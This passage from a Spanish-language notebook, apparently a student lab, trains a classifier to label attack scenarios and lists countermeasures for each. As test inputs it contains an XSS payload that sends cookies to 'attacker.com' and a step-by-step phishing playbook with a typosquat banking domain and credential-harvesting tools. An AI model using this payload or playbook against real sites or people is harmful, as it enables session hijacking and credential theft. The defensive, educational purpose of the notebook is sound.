    3. Inject malicious script: <script>document.location='http://attacker.com/steal?cookie='+document.cookie</script>
    4. Wait for victim to view the page
    5. Capture session cookies on attacker server
    6. Use stolen cookies to impersonate the victim''',
    
    'Vulnerability': '''Reflected XSS, Stored XSS, Lack of input validation, Missing output encoding, 
    Improper HTML sanitization, No Content Security Policy (CSP), Insufficient XSS filters''',
    
    'Tags': '''XSS, Cross-Site Scripting, Web Security, JavaScript Injection, Cookie Theft, 
    Session Hijacking, DOM-based XSS, Client-Side Attack, OWASP Top 10'''
}

# Realizar predicci√≥n
xss_prediction = predict_attack_type(xss_scenario)

print("\nüìã DETALLES DEL ESCENARIO XSS:")
print(f"Descripci√≥n: {xss_scenario['Scenario Description'][:100]}...")
print(f"Herramientas: {xss_scenario['Tools Used'][:80]}...")
print(f"Pasos del ataque: {xss_scenario['Attack Steps '][:80]}...")

print(f"\nüîç PREDICCI√ìN DEL MODELO:")
print(f"   Tipo de Ataque Predicho: {xss_prediction}")

print("\nüí° CARACTER√çSTICAS DEL ATAQUE XSS:")
print("   ‚Ä¢ Tipo: Inyecci√≥n de c√≥digo del lado del cliente")
print("   ‚Ä¢ Objetivo: Robo de sesiones, cookies, credenciales")
print("   ‚Ä¢ Vector: Formularios web, campos de entrada sin sanitizar")
print("   ‚Ä¢ Impacto: Alto - Compromiso de cuentas de usuario")

print("\nüõ°Ô∏è CONTRAMEDIDAS RECOMENDADAS:")
print("   ‚úì Implementar Content Security Policy (CSP)")
print("   ‚úì Validar y sanitizar toda entrada del usuario")
print("   ‚úì Codificar salida HTML (HTML encoding)")
print("   ‚úì Usar HttpOnly y Secure flags en cookies")
print("   ‚úì Implementar filtros anti-XSS")
print("   ‚úì Validaci√≥n del lado del servidor")
print("   ‚úì Usar librer√≠as de sanitizaci√≥n como DOMPurify")

üéØ ESCENARIO 1: ATAQUE DE CROSS-SITE SCRIPTING (XSS)

üìä Top 3 predicciones con probabilidades:
   1. Stored XSS: 33.00%
   2. DOM-Based XSS: 8.00%
   3. Reflected XSS: 7.00%

üìã DETALLES DEL ESCENARIO XSS:
Descripci√≥n: A web application comment section does not properly sanitize user input. 
    An attacker injects ma...
Herramientas: Browser Developer Tools, Burp Suite, XSS Hunter, OWASP ZAP, 
    BeEF (Browser E...
Pasos del ataque: 1. Identify input fields without proper validation
    2. Test with simple paylo...

üîç PREDICCI√ìN DEL MODELO:
   Tipo de Ataque Predicho: Stored XSS

üí° CARACTER√çSTICAS DEL ATAQUE XSS:
   ‚Ä¢ Tipo: Inyecci√≥n de c√≥digo del lado del cliente
   ‚Ä¢ Objetivo: Robo de sesiones, cookies, credenciales
   ‚Ä¢ Vector: Formularios web, campos de entrada sin sanitizar
   ‚Ä¢ Impacto: Alto - Compromiso de cuentas de usuario

üõ°Ô∏è CONTRAMEDIDAS RECOMENDADAS:
   ‚úì Implementar Content Security Policy (CSP)
   ‚úì Validar y sanitizar toda entrada de

#### Escenario 2: Ataque de Phishing y Social Engineering

In [46]:
# Escenario 2: Ataque de Phishing y Social Engineering
print("\n" + "=" * 80)
print("üéØ ESCENARIO 2: ATAQUE DE PHISHING Y SOCIAL ENGINEERING")
print("=" * 80)

phishing_scenario = {
    'Scenario Description': '''An attacker creates a fake login page that mimics a legitimate banking website.
    They send emails to thousands of users claiming their account has been compromised and needs
    immediate verification. The email contains a link to the fake site. When users enter their
    credentials, the attacker captures them in real-time and uses them to access the real accounts.
    The fake page is hosted on a similar-looking domain with HTTPS to appear legitimate.''',
    
    'Tools Used': '''Social Engineering Toolkit (SET), GoPhish, Email spoofing tools, Evilginx2,
    Modlishka, BlackEye, Zphisher, Domain registration services, HTTPS certificates from Let\'s Encrypt,
    Email harvesting tools, OSINT framework''',
    
    'Attack Steps ': '''1. Research target organization and gather email addresses via OSINT
    2. Create convincing phishing email template mimicking legitimate communications
    3. Register similar domain name (typosquatting): bankofamer1ca.com instead of bankofamerica.com
    4. Clone legitimate login page and host on fake domain
    5. Set up HTTPS certificate to make site appear secure
    6. Send mass phishing emails with urgency-inducing content
    7. Set up credential harvesting backend to capture login attempts
    8. Monitor incoming credentials in real-time
    9. Test captured credentials on legitimate site
    10. Use valid credentials for unauthorized access or sell on dark web''',
    
    'Vulnerability': '''Human Factor, Lack of security awareness, Missing email authentication (SPF, DKIM, DMARC),
    No multi-factor authentication (MFA), Weak phishing detection, Similar domain registration allowed,
    User trust exploitation, Urgency manipulation, Authority impersonation''',
    
    'Tags': '''Phishing, Social Engineering, Email Spoofing, Credential Theft, Typosquatting,
    Fake Login Page, Human Hacking, Spear Phishing, Domain Spoofing, Identity Theft, 
    Psychological Manipulation, OSINT, Impersonation Attack'''
}

# Realizar predicci√≥n
phishing_prediction = predict_attack_type(phishing_scenario)

print("\nüìã DETALLES DEL ESCENARIO PHISHING:")
print(f"Descripci√≥n: {phishing_scenario['Scenario Description'][:100]}...")
print(f"Herramientas: {phishing_scenario['Tools Used'][:80]}...")
print(f"Pasos del ataque: {phishing_scenario['Attack Steps '][:80]}...")

print(f"\nüîç PREDICCI√ìN DEL MODELO:")
print(f"   Tipo de Ataque Predicho: {phishing_prediction}")

print("\nüí° CARACTER√çSTICAS DEL ATAQUE PHISHING:")
print("   ‚Ä¢ Tipo: Ingenier√≠a social y suplantaci√≥n de identidad")
print("   ‚Ä¢ Objetivo: Robo de credenciales y datos personales")
print("   ‚Ä¢ Vector: Correo electr√≥nico, sitios web falsos")
print("   ‚Ä¢ Impacto: Cr√≠tico - Compromiso total de cuentas")

print("\nüõ°Ô∏è CONTRAMEDIDAS RECOMENDADAS:")
print("   ‚úì Implementar autenticaci√≥n multifactor (MFA/2FA)")
print("   ‚úì Capacitaci√≥n en seguridad y awareness training")
print("   ‚úì Filtros anti-phishing en correo electr√≥nico")
print("   ‚úì Verificaci√≥n de dominios y certificados")
print("   ‚úì Implementar SPF, DKIM y DMARC")
print("   ‚úì Reportar sitios fraudulentos a autoridades")
print("   ‚úì Usar gestores de contrase√±as (detectan URLs falsas)")
print("   ‚úì Verificar URLs antes de ingresar credenciales")

# Comparaci√≥n de escenarios
print("\n" + "=" * 80)
print("üìä COMPARACI√ìN DE ESCENARIOS ANALIZADOS")
print("=" * 80)

scenarios_comparison = pd.DataFrame({
    'Escenario': ['SQL Injection (Original)', 'XSS Attack', 'Phishing Attack'],
    'Predicci√≥n': ['SQLi, Web Security', xss_prediction, phishing_prediction],
    'Vector Principal': ['Formularios Web', 'Input no sanitizado', 'Email + Sitio Falso'],
    'Complejidad T√©cnica': ['Media', 'Media', 'Baja'],
    'Factor Humano': ['Bajo', 'Bajo', 'Alto'],
    'Impacto': ['Alto', 'Alto', 'Cr√≠tico']
})

print("\n")
print(scenarios_comparison.to_string(index=False))

print("\n" + "=" * 80)
print("‚úÖ AN√ÅLISIS COMPLETO DE ESCENARIOS FINALIZADO")
print("=" * 80)
print(f"\nüìå Total de escenarios analizados: 3")
print(f"   1. SQL Injection - Explotaci√≥n de bases de datos")
print(f"   2. XSS Attack - Inyecci√≥n de scripts maliciosos")
print(f"   3. Phishing - Ingenier√≠a social y robo de credenciales")

print("\nüíº CONCLUSIONES:")
print("   ‚Ä¢ Los ataques t√©cnicos (SQLi, XSS) requieren conocimientos espec√≠ficos")
print("   ‚Ä¢ El phishing explota vulnerabilidades humanas, siendo m√°s efectivo")
print("   ‚Ä¢ La combinaci√≥n de controles t√©cnicos y capacitaci√≥n es esencial")
print("   ‚Ä¢ La detecci√≥n temprana y respuesta r√°pida son cr√≠ticas")
print("   ‚Ä¢ La seguridad en capas (defense in depth) es la mejor estrategia")


üéØ ESCENARIO 2: ATAQUE DE PHISHING Y SOCIAL ENGINEERING

üìä Top 3 predicciones con probabilidades:
   1. Credential Stealer: 13.00%
   2. JavaScript-Based Tab Replacement: 7.00%
   3. Spear Phishing with Payloads: 6.00%

üìã DETALLES DEL ESCENARIO PHISHING:
Descripci√≥n: An attacker creates a fake login page that mimics a legitimate banking website.
    They send emails...
Herramientas: Social Engineering Toolkit (SET), GoPhish, Email spoofing tools, Evilginx2,
    ...
Pasos del ataque: 1. Research target organization and gather email addresses via OSINT
    2. Crea...

üîç PREDICCI√ìN DEL MODELO:
   Tipo de Ataque Predicho: Credential Stealer

üí° CARACTER√çSTICAS DEL ATAQUE PHISHING:
   ‚Ä¢ Tipo: Ingenier√≠a social y suplantaci√≥n de identidad
   ‚Ä¢ Objetivo: Robo de credenciales y datos personales
   ‚Ä¢ Vector: Correo electr√≥nico, sitios web falsos
   ‚Ä¢ Impacto: Cr√≠tico - Compromiso total de cuentas

üõ°Ô∏è CONTRAMEDIDAS RECOMENDADAS:
   ‚úì Implementar autenticaci√≥n

---
---

## üéì Conclusiones Finales y Aprendizajes Clave

### üìä Resultado del Proyecto

Este notebook ha documentado exitosamente el proceso completo de construcci√≥n, diagn√≥stico y optimizaci√≥n de un modelo de clasificaci√≥n de ataques de seguridad, logrando:

- ‚úÖ **Accuracy final: 80.63%** (de 25% inicial)
- ‚úÖ **Modelo confiable y robusto** para uso pr√°ctico
- ‚úÖ **167 tipos de ataque cubiertos** (balance diversidad/calidad)
- ‚úÖ **Proceso reproducible y documentado**

### üîë Aprendizajes T√©cnicos Clave

#### **1. El An√°lisis Exploratorio NO es Opcional**
> "Un modelo es tan bueno como los datos con los que se entrena"

- El 90% de los problemas de ML se resuelven con mejor preparaci√≥n de datos
- Identificar problemas ANTES del entrenamiento ahorra tiempo y recursos
- M√©tricas como el ratio clases/muestras son indicadores cr√≠ticos

#### **2. M√°s Datos ‚â† Mejor Modelo**
> "Calidad sobre cantidad"

- Tener 8,834 clases NO es mejor que tener 167 clases bien representadas
- Eliminar datos de baja calidad mejora el rendimiento general
- El filtrado inteligente es una t√©cnica de limpieza esencial

#### **3. Iteraci√≥n Metodol√≥gica**
> "La primera soluci√≥n rara vez es la √≥ptima"

- Baseline ‚Üí An√°lisis ‚Üí Optimizaci√≥n ‚Üí Validaci√≥n
- Experimentar con diferentes configuraciones de manera sistem√°tica
- Comparar m√©tricas m√∫ltiples, no solo accuracy

#### **4. Interpretaci√≥n Cr√≠tica de M√©tricas**
> "Un modelo con 68% de accuracy puede ser inutilizable"

- Accuracy alto NO garantiza modelo √∫til
- Precision y Recall contextualizan el rendimiento real
- Gap entre m√©tricas macro y weighted revela desbalances

### üõ†Ô∏è T√©cnicas Aplicadas con √âxito

| T√©cnica | Prop√≥sito | Impacto |
|---------|-----------|---------|
| **An√°lisis ratio clases/muestras** | Detectar overfitting potencial | Identific√≥ problema cr√≠tico |
| **Filtrado por umbral** | Eliminar clases con datos insuficientes | +18% accuracy |
| **Experimentaci√≥n sistem√°tica** | Encontrar configuraci√≥n √≥ptima | Balance diversidad/rendimiento |
| **Estratificaci√≥n en split** | Mantener distribuci√≥n en train/test | Evaluaci√≥n m√°s confiable |
| **M√©tricas m√∫ltiples** | Evaluaci√≥n hol√≠stica | Visi√≥n completa del rendimiento |

### üö´ Errores Comunes Evitados

1. ‚ùå **Ignorar warnings sin investigar**: Los warnings de scikit-learn son indicadores de problemas reales
2. ‚ùå **Confiar solo en accuracy**: Otras m√©tricas son igualmente importantes
3. ‚ùå **No analizar distribuci√≥n de datos**: El EDA es fundamental
4. ‚ùå **Entrenar con todas las clases "por si acaso"**: Menos es m√°s cuando la calidad es baja
5. ‚ùå **No comparar versiones del modelo**: La iteraci√≥n requiere comparaci√≥n objetiva

### üéØ Aplicabilidad en Otros Contextos

Las t√©cnicas documentadas en este notebook son aplicables a:

- **Clasificaci√≥n multiclase con desbalance**: Cualquier problema con muchas clases y datos limitados
- **Clasificaci√≥n de texto**: NLP en general (spam, sentimientos, categorizaci√≥n)
- **Detecci√≥n de anomal√≠as**: Sistemas de seguridad, fraude, intrusiones
- **Diagn√≥stico m√©dico**: Clasificaci√≥n de enfermedades raras
- **Clasificaci√≥n de im√°genes**: Cuando hay clases con pocas muestras

### üìö Referencias y Recursos Adicionales

Para profundizar en los conceptos aplicados:

1. **Overfitting y Underfitting**
   - *Understanding the Bias-Variance Tradeoff* - Scott Fortmann-Roe
   
2. **M√©tricas de Clasificaci√≥n**
   - *Precision, Recall, F1-Score: A Simple Explanation* - Google ML Crash Course
   
3. **Preparaci√≥n de Datos**
   - *Data Preprocessing for Machine Learning* - Andrew Ng, Stanford CS229

4. **Random Forest**
   - *Random Forests* - Leo Breiman (paper original)
   - Scikit-learn Documentation: Random Forest Classifier

### üôè Agradecimientos

Este notebook fue desarrollado como parte del Laboratorio 3 ya que teniamos muchos retrasos, tanto usandolo en Colab como local, es neceario hacer siempre un analisis completo de la DATA. 
Axel Pullaguari

---

**Fecha de √∫ltima actualizaci√≥n**: Noviembre 20, 2025  
**Versi√≥n del modelo**: v2.0 (Optimizado)  
